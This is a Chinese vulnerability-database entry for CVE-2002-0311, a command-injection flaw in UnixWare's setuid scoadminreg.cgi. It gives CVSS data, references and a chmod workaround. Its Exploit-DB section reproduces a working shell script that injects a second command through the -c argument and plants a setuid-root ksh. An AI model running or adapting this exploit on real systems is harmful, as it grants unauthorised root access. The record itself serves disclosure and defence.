CVE-2002-0311
CVSS10.0
发布时间 :2002-05-31 00:00:00
修订时间 :2008-09-10 20:00:55
NMCOES    

[原文]Vulnerability in webtop in UnixWare 7.1.1 and Open UNIX 8.0.0 allows local and possibly remote attackers to gain root privileges via shell metacharacters in the -c argument for (1) in scoadminreg.cgi or (2) service_action.cgi.


[CNNVD]Unixware scoadminreg.cgi本地权限提升漏洞(CNNVD-200205-142)

        
        scoadminreg.cgi是Unixware携带的一个管理CGI,在某些版本的Unixware 下它被设置了setuid root属性。
        由于它的"-c"参数没有正确检查用户输入的命令行参数中是否包含shell元字符,从而使得攻击者可以指定任意程序以root权限执行,从而获取本地root shell。
        存在被远程利用的可能,尚未确认。
        

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:caldera:unixware:7.1.1
cpe:/o:caldera:openunix:8.0

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0311
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0311
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200205-142
(官方数据源) CNNVD

- 其它链接及资源

http://www.iss.net/security_center/static/7977.php
(VENDOR_ADVISORY)  XF  unixware-webtop-execute-commands(7977)
http://online.securityfocus.com/archive/1/251747
(UNKNOWN)  BUGTRAQ  20020120 Unixware 7.1.1 scoadminreg.cgi local exploit
ftp://stage.caldera.com/pub/security/openunix/CSSA-2002-SCO.6/CSSA-2002-SCO.6.txt
(UNKNOWN)  CALDERA  CSSA-2002-SCO.6
http://www.securityfocus.com/bid/3936
(UNKNOWN)  BID  3936

- 漏洞信息

Unixware scoadminreg.cgi本地权限提升漏洞
危急 输入验证
2002-05-31 00:00:00 2005-10-20 00:00:00
本地  
        
        scoadminreg.cgi是Unixware携带的一个管理CGI,在某些版本的Unixware 下它被设置了setuid root属性。
        由于它的"-c"参数没有正确检查用户输入的命令行参数中是否包含shell元字符,从而使得攻击者可以指定任意程序以root权限执行,从而获取本地root shell。
        存在被远程利用的可能,尚未确认。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        # chmod 500 /opt/webtop/bin/i3un0212/cgi-bin/admin/scoadminreg.cgi
        厂商补丁:
        Caldera
        -------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.caldera.com

- 漏洞信息 (21239)

Caldera UnixWare 7.1.1 WebTop SCOAdminReg.CGI Arbitrary Command Execution Vulnerability (EDBID:21239)
unixware local
2002-01-20 Verified
0 jGgM
N/A [点击下载]
source: http://www.securityfocus.com/bid/3936/info

UnixWare is a commercial Unix implementation distributed originally developed by SCO. It is now maintained and distributed by Caldera.

The scoadminreg.cgi program does not properly validate user input when executed with the -c option. Because of this, a user may load an arbitrary program with the -c flag. When this program is executed, the file loaded with the -c flag will be executed with administrative privileges. 

#!/bin/sh

## jggm@mail.com

CC="gcc"
SCOADMIN=/opt/webtop/bin/i3un0212/cgi-
bin/admin/scoadminreg.cgi

#
#
#
#

echo
echo "jGgM root exploit"
echo "http://www.netemperor.com/"
echo
echo "Mail: jggm@mail.com"
echo

if [ ! -x $SCOADMIN ]; then
   echo "$SCOADMIN file not found"
   exit 2;
fi

cat >/tmp/jggm.c <<_EOF

main()
{
   setuid(0);
   setgid(0);
   chown("/tmp/jGgM_Shell", 0, 0);
   chmod("/tmp/jGgM_Shell", 04755);
}
_EOF

cp /bin/ksh /tmp/jGgM_Shell
$CC -o /tmp/jggm /tmp/jggm.c

$SCOADMIN "-c /tmp/jggm;/tmp/jggm;"

rm -rf /tmp/jggm /tmp/jggm.c

/tmp/jGgM_Shell

# end of file..		

- 漏洞信息

9332
Open UNIX/UnixWare webtop scoadminreg.cgi -c Argument Handling Local Privilege Escalation
Local Access Required Input Manipulation
Loss of Integrity Patch / RCS
Exploit Public Vendor Verified, Third-party Verified

- 漏洞描述

- 时间线

2002-01-20 Unknow
2002-01-20 Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, the vendor has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Caldera UnixWare WebTop SCOAdminReg.CGI Arbitrary Command Execution Vulnerability
Input Validation Error 3936
No Yes
2002-01-20 12:00:00 2009-07-11 09:56:00
This vulnerability was discovered by jGgM. <jggm@mail.com>, and announced via Bugtraq on January 20, 2002.

- 受影响的程序版本

Caldera UnixWare 7.1.1
Caldera OpenUnix 8.0

- 漏洞讨论

UnixWare is a commercial Unix implementation distributed originally developed by SCO. It is now maintained and distributed by Caldera.

The scoadminreg.cgi program does not properly validate user input when executed with the -c option. Because of this, a user may load an arbitrary program with the -c flag. When this program is executed, the file loaded with the -c flag will be executed with administrative privileges.

- 漏洞利用

Contributed by jGgM. &lt;jggm@mail.com&gt;:

- 解决方案

Upgrades are available.


Caldera UnixWare 7.1.1

Caldera OpenUnix 8.0

- 相关参考

     

     

    关于SCAP中文社区

    SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

    版权声明

    CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站